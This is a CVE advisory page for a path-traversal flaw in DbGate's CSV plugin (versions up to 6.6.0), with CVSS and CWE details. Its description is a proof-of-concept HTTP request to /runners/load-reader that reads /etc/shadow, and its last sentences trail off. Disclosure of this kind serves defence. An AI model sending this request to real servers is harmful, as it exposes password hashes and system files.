CVE Details
Basic Information
| Title | DbGate allows Unauthorized File Access via CSV Plugin |
|---|---|
| Type | cve |
| Published | 2025-07-26T03:34:43.481Z |
| Modified | 2025-07-26T03:34:43.481Z |
Product Information
| Vendor | dbgate |
|---|---|
| Product | dbgate |
| Version | <= 6.6.0 |
CVSS Information
| Base Score | 7.0 (HIGH) |
|---|---|
| Attack Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P |
Affected Products
- dbgate dbgate <= 6.6.0
Additional Information
| CWE List | CWE-29 |
|---|---|
| Source | GitHub_M |
Description
“`
POST /runners/load-reader HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Authorization: Bearer
Content-Length: 127
Origin: http://192.168.124.119:3000
Connection: keep-alive
Cookie:
Priority: u=0
Cache-Control: max-age=0
{“functionName”:”reader@dbgate-plugin-csv”,”props”:{“fileName”:”/etc\/shadow”,”limitRows”:100}}
“`
The request payload:

Lines of the file being returned:
